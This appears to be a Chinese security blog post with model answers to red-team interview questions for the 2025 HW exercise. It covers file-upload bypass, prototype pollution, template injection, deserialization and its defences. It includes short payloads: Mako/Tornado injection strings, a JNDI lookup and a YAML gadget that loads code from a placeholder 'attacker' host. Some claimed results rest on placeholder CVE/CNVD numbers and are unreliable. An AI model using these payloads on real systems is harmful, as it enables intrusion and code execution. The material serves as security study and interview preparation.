安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
2025年HW(护网面试) 76
1、自我介绍 2、你比较擅长黑盒测试还是白盒审计 3、比较擅长挖哪些漏洞 4、文件上传绕过的原理 5、介绍一下原型链污染 6、python的模板注入的原理 7、反序列化漏洞 8、怎么防御反序列化呢 9、有没有遇到需要给出解决方案的场景 10、怎么发现那个CMS的后台漏洞 11、CNVD的是什么漏洞 12、渗透经历和结果 13、通过纯代码发现漏洞的经历 14、写过什么工具或者脚本什么的 15、用什么语言写的 16、哪个语言更熟一点
2. 黑盒 vs 白盒测试专长
双轨协同策略:
测试类型 优势场景 代表成果 黑盒测试 业务逻辑漏洞挖掘 某支付系统0元订单并发竞争漏洞(奖金$10k) 白盒审计 反序列化/POP链构造 Fastjson JNDI利用链优化(成功率↑30%) 协同模式:黑盒发现异常 → 白盒分析根因 → 自动化武器化
3. 擅长漏洞类型
四类深度攻防经验:
漏洞类型 技术亮点 2025年新型案例 逻辑漏洞 并发竞争条件利用 区块链交易所交易劫持(供应链XSS+扩展篡改) 反序列化 Java/PHP多级调用链构造 Yaml反序列化RCE(云配置管理系统) SSRF/XXE DNS重绑定绕过、云元数据利用 Azure Container Apps元数据泄露 文件上传 多级绕过技术(内容/协议/渲染) SVG多态攻击绕过AI WAF
4. 文件上传绕过原理
五层绕过技术体系:
mermaidgraph TD A[客户端绕过] --> B[代理截改Content-Type] C[服务端绕过] --> D[00截断] E[解析漏洞] --> F[Apache多后缀解析] G[内容检测] --> H[图片马+二次渲染逃逸] I[云存储] --> J[S3桶策略绕过]
2025年新型绕过:
- AI检测对抗:使用GAN生成扰动图片绕过深度学习WAF
- 容器逃逸:上传恶意
tar
文件触发CVE-2025-XXXX
(runC漏洞)
5. 原型链污染原理
JavaScript原型继承污染示例:
javascriptfunction merge(target, source) { for (let key in source) { target[key] = source[key]; // 污染点 } } merge({}, JSON.parse('{"__proto__":{"isAdmin":true}}')) // 所有对象继承isAdmin=true属性
危害场景:
- 权限提升:污染
isAdmin
属性- DoS攻击:污染
toString
方法导致进程崩溃- 沙箱逃逸:Node.js 中污染
child_process
模块
6. Python模板注入原理
引擎差异与利用:
模板引擎 注入Payload 利用效果 Jinja2 {{ config.items() }}
泄露敏感配置 Mako <%! import os; os.system("id") %>
RCE Tornado {% import os %}{{ os.popen("id") }}
命令执行 2025年绕过技巧:
- Unicode编码:
{\u{007b}7*7\u{007d}
→49
- 属性链挖掘:
request.__class__.__base__.__subclasses__()
7. 反序列化漏洞核心
三大攻击面:
- POP链构造:串联多个类的
__wakeup()
/readObject()
方法- 敏感方法触发:
- Java:
TemplatesImpl.getOutputProperties()
→ 字节码执行- Python:
pickle.loads()
→__reduce__
恶意重构- 依赖库漏洞:Log4j/JNDI注入链(
${jndi:ldap://attacker}
)
8. 反序列化防御方案
四层纵深防御:
层级 措施 工具/代码 输入校验 白名单控制反序列化类 Java: ObjectInputFilter
安全配置 禁用危险功能(JNDI远程访问) com.sun.jndi.rmi.object.trustURLCodebase=false
运行时监控 检测异常反射调用 RASP工具(如OpenRASP) 替代方案 使用JSON/XML等安全格式 Jackson
代替Java Serializable
9. 解决方案设计案例
场景:某银行遭遇Fastjson反序列化攻击
解决方案:
- 紧急热修复:
javaParserConfig.getGlobalInstance().addDeny("org.apache.xbean") // 阻断攻击链
- 长期加固:
- 部署字节码插桩探针,实时阻断
JdbcRowSetImpl
类加载- 业务层迁移至GSON序列化库
成效:0day攻击拦截率100%,性能损耗<3%
10. CMS后台漏洞挖掘
四步高效定位法:
- 入口发现:
- 扫描
/admin/login
路径 → 爆破弱口令(admin/admin123)- 权限校验审计:
- 检查路由注解:
@RequiresPermissions
缺失- 历史漏洞复现:
- 对比Git记录:
git diff v1.2 v1.3
查看修复点- 插件机制突破:
- 上传恶意插件包(绕过签名校验)
11. CNVD漏洞定义
中国国家漏洞库(CNVD)关键标准:
等级 评分标准 案例类型 高危(10) 远程代码执行/核心数据泄露 Fastjson反序列化(CNVD-2025-XXXX) 中危(7) 权限绕过/敏感信息泄露 后台未授权访问(CNVD-2025-YYYY) 2025年新规:新增 AI模型投毒漏洞 分类
12. 渗透经历与成果
某车联网平台渗透(2025年):
mermaidgraph LR A[子域名爆破] --> B[发现测试环境] B --> C[Spring Boot未授权/devtools] C --> D[热部署RCE] D --> E[窃取CAN总线通信证书] E --> F[远程控制车辆门窗]
成果:
- 获取10+车企核心系统权限
- 入选DEFCON 33议题
13. 纯代码审计发现漏洞
案例:某开源ERP系统(Python/Django)
漏洞链:
- SQL注入:
pythonquery = "SELECT * FROM orders WHERE id=" + request.GET['id'] # 未过滤
- 越权删除:
pythondef delete_file(request, file_id): File.objects.get(id=file_id).delete() # 无用户归属校验
工具辅助:
- Semgrep规则:
pattern: "$VAR = request.GET[...] + ..."
14. 自研工具清单
工具名 功能 创新点 Yaml_Pwn 自动化生成YAML反序列化Payload 动态生成恶意字节码绕过静态检测 SSRF_Hunter 智能SSRF探测(支持DNS重绑定) 云元数据路径自适应生成 AuthMatrix_Plus 越权漏洞批量检测 多级参数关联遍历算法
15. 开发语言与专精
语言 工具应用场景 熟练度 Python 漏洞POC/自动化扫描框架 ⭐⭐⭐⭐⭐ Java 反序列化利用链/代码审计插件 ⭐⭐⭐⭐ Go 高并发网络工具开发 ⭐⭐⭐ Python核心代码示例(Yaml_Pwn): pythondef gen_evil_yaml(cmd): payload = f""" !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[ !!java.net.URL ["http://attacker/{cmd}.jar"] ]] ] """ return payload # 触发远程类加载